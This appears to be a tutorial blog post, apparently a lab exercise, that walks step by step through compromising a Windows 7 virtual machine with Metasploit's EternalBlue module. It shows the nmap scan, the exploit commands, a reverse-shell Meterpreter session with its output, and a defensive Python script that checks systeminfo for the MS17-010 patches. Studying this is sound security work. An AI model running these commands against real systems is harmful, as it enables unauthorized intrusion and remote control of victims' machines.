
Using Metasploit (msf) to take control of a Windows machine through the ms17_010_eternalblue vulnerability

First, two things to introduce:

[image: screenshot not included]

[image: screenshot not included]

One thing to be clear about: attacking someone else's computer without authorization is illegal.

Now, on to the topic of this post.

First, start Kali (a well-known Linux distribution built for penetration testing; it ships the tools this walkthrough needs).

Then open Applications - Exploitation Tools - metasploit.

Once it starts, you see:

[i] Database already started
[i] The database appears to be already configured, skipping initialization

[Metasploit ASCII-art banner (https://metasploit.com) omitted]

       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

Port-scan the host 10.0.3.65 directly with nmap (msfconsole passes commands it does not recognise through to the system shell):

msf > nmap -sV -Pn -p1-65535 -O -v 10.0.3.65

The result. Note that -O (OS fingerprinting) needs raw sockets, so the first attempt is refused and the scan was re-run with sudo (in the captured output it was re-run from a macOS shell rather than from msfconsole):

TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
YoussefdeMacBook-Pro:~ youssef$ sudo nmap -sV -Pn -p1-65535 -O -v 10.0.3.65
Password:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 10:56 CST
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 10:56
Scanning 10.0.3.65 [1 port]
Completed ARP Ping Scan at 10:56, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.01s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 10.0.3.65 [65535 ports]
Discovered open port 139/tcp on 10.0.3.65
Discovered open port 135/tcp on 10.0.3.65
Discovered open port 3389/tcp on 10.0.3.65
Discovered open port 445/tcp on 10.0.3.65
Discovered open port 49153/tcp on 10.0.3.65
Discovered open port 49157/tcp on 10.0.3.65
Discovered open port 49152/tcp on 10.0.3.65
Discovered open port 49155/tcp on 10.0.3.65
Discovered open port 49154/tcp on 10.0.3.65
Discovered open port 49156/tcp on 10.0.3.65
Discovered open port 1688/tcp on 10.0.3.65
Completed SYN Stealth Scan at 10:57, 37.66s elapsed (65535 total ports)
Initiating Service scan at 10:57
Scanning 11 services on 10.0.3.65
Service scan Timing: About 36.36% done; ETC: 10:59 (0:01:35 remaining)
Completed Service scan at 10:58, 81.47s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.0.3.65
NSE: Script scanning 10.0.3.65.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Nmap scan report for 10.0.3.65
Host is up (0.0039s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
1688/tcp  open  msrpc          Microsoft Windows RPC
3389/tcp  open  ms-wbt-server?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49156/tcp open  msrpc          Microsoft Windows RPC
49157/tcp open  msrpc          Microsoft Windows RPC
MAC Address: 2C:6E:85:8D:C8:C7 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.311 days (since Tue Aug  7 03:30:19 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: WIN-EEGC1ODGIOU; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.04 seconds
           Raw packets sent: 66869 (2.943MB) | Rcvd: 65555 (2.623MB)

The host fingerprints as Windows 7 and has port 445 (SMB) open, so there is a good chance ms17_010_eternalblue applies. Two caveats: the fingerprint is a range guess (Windows 7 / Server 2008 R2 / 8.x), and an open 445 says nothing about whether the March 2017 MS17-010 update is installed, so treat this as a candidate to confirm, not a confirmed vulnerability. If the host is not in that Windows range or 445 is not open, the experiment ends here.

Next, load the exploit module for this vulnerability. Two things worth doing first that this walkthrough skips: confirm the host really is unpatched with the auxiliary/scanner/smb/smb_ms17_010 check (EternalBlue corrupts the SMB server's kernel pool, and a failed attempt can crash the target), and set LHOST explicitly if the attacking machine has more than one interface, since the handler address in the output below was auto-detected. Then enter:

msf > use exploit/windows/smb/ms17_010_eternalblue   // select the ms17_010_eternalblue exploit module
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.3.65
rhost => 10.0.3.65   // set the target
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp   // use Meterpreter, which provides many useful post-exploitation features; optional, the author notes that without it you get a plain Windows cmd shell instead
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > run   // launch the attack

The output:

[*] Started reverse TCP handler on 10.0.3.215:4444 
[*] 10.0.3.65:445 - Connecting to target for exploitation.
[+] 10.0.3.65:445 - Connection established for exploitation.
[+] 10.0.3.65:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.3.65:445 - CORE raw buffer dump (42 bytes)
[*] 10.0.3.65:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.0.3.65:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.0.3.65:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.0.3.65:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.3.65:445 - Trying exploit with 17 Groom Allocations.
[*] 10.0.3.65:445 - Sending all but last fragment of exploit packet
[*] 10.0.3.65:445 - Starting non-paged pool grooming
[+] 10.0.3.65:445 - Sending SMBv2 buffers
[+] 10.0.3.65:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.3.65:445 - Sending final SMBv2 buffers.
[*] 10.0.3.65:445 - Sending last fragment of exploit packet!
[*] 10.0.3.65:445 - Receiving response from exploit packet
[+] 10.0.3.65:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.3.65:445 - Sending egg to corrupted connection.
[*] 10.0.3.65:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.0.3.65
[*] Meterpreter session 3 opened (10.0.3.215:4444 -> 10.0.3.65:49162) at 2018-08-07 11:41:05 +0800
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

Check system information with sysinfo:

meterpreter > sysinfo

Computer        : WIN-EEGC1ODGIOU
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

Get a command-line shell:

meterpreter > shell

Process 2772 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo

Host Name:                 WIN-EEGC1ODGIOU
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00371-OEM-8992671-00524
Original Install Date:     2017/8/25, 16:31:04
System Boot Time:          2018/8/7, 11:59:41
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 61 Stepping 4 GenuineIntel ~1995 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 2017/5/19
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (UTC+08:00) Beijing, Chongqing, Hong Kong SAR, Urumqi
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,542 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,569 MB
Virtual Memory: In Use:    526 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.3.1
                                 IP address(es)
                                 [01]: 10.0.3.65
                                 [02]: fe80::dec:dc90:295b:668c

C:\Windows\system32>
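The hotfix section of that dump is the part worth reading closely: it is what tells you, from inside the box, whether MS17-010 was ever applied. As an added check (example code written for this edit, not from the original post), the following Python reads a systeminfo dump like the one above and classifies the host. The KB table is my recollection of the March 2017 security-only and monthly-rollup updates from the MS17-010 bulletin and should be verified against Microsoft's advisory; the sample dumps are constructed, the first trimmed from the output above and the other two altered to show the remaining outcomes.

```python
"""Check a `systeminfo` dump for the MS17-010 (EternalBlue) updates."""
import re

# Assumed KB table (verify against the MS17-010 bulletin before relying on it):
# the March 2017 security-only and monthly-rollup updates per Windows version.
MS17_010_KBS = {
    "6.0": {"KB4012598"},                # Vista / Server 2008
    "6.1": {"KB4012212", "KB4012215"},   # Windows 7 SP1 / Server 2008 R2 SP1
    "6.2": {"KB4012214", "KB4012217"},   # Server 2012
    "6.3": {"KB4012213", "KB4012216"},   # Windows 8.1 / Server 2012 R2
}

# "6.1.7601" -> the major.minor prefix selects a row of the table above.
VERSION_RE = re.compile(r"\b(\d+\.\d+)\.\d{4,5}\b")
KB_RE = re.compile(r"\bKB(\d+)\b")

# Constructed sample, trimmed from the systeminfo output above: the only
# hotfix is KB976902, the SP1 prerequisite, so nothing from March 2017 is there.
SAMPLE_UNPATCHED = """\
Host Name:                 WIN-EEGC1ODGIOU
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
BIOS Version:              Phoenix Technologies LTD 6.00, 2017/5/19
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB976902
"""

# Constructed counter-examples for the two other outcomes.
SAMPLE_PATCHED = SAMPLE_UNPATCHED.replace("1 Hotfix(s)", "2 Hotfix(s)") + \
    "                           [02]: KB4012212\n"
SAMPLE_LATER_ROLLUP = SAMPLE_UNPATCHED.replace("1 Hotfix(s)", "2 Hotfix(s)") + \
    "                           [02]: KB4015549\n"   # April 2017 Win7 rollup (assumed)


def os_version(text):
    """Return the 'major.minor' Windows version found in the dump, or None."""
    m = VERSION_RE.search(text)
    return m.group(1) if m else None


def installed_kbs(text):
    """Return the numeric part of every KBnnnnnn listed anywhere in the dump."""
    return {int(n) for n in KB_RE.findall(text)}


def ms17_010_status(text):
    """Classify the host as 'patched', 'unpatched', 'inconclusive' or 'unknown-os'.

    'inconclusive' means none of the MS17-010 KBs is listed but a higher-numbered
    update is; later cumulative rollups also carry the fix, so the KB list alone
    cannot settle it.  That case, and really any 'unpatched' verdict, should be
    confirmed over the network with auxiliary/scanner/smb/smb_ms17_010.
    """
    needed = MS17_010_KBS.get(os_version(text))
    if needed is None:
        return "unknown-os"
    needed_nums = {int(k[2:]) for k in needed}
    have = installed_kbs(text)
    if have & needed_nums:
        return "patched"
    if have and max(have) > max(needed_nums):
        return "inconclusive"
    return "unpatched"


if __name__ == "__main__":
    for name, dump in (("page host", SAMPLE_UNPATCHED),
                       ("patched", SAMPLE_PATCHED),
                       ("later rollup", SAMPLE_LATER_ROLLUP)):
        print(f"{name}: {ms17_010_status(dump)}")
```

The parser keys on the version number and the KB identifiers rather than the field labels, so it works on a localized systeminfo dump (the original Chinese output above included) as long as the KB lines are present.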

Note the hotfix list: only KB976902 (the Windows 7 SP1 prerequisite update) is installed, so the March 2017 MS17-010 update is missing, which is why the exploit went through. Exit:

C:\Windows\system32>exit
exit
meterpreter > 
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.0.3.65 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(windows/smb/ms17_010_eternalblue) > 

For details on the individual commands, see this article: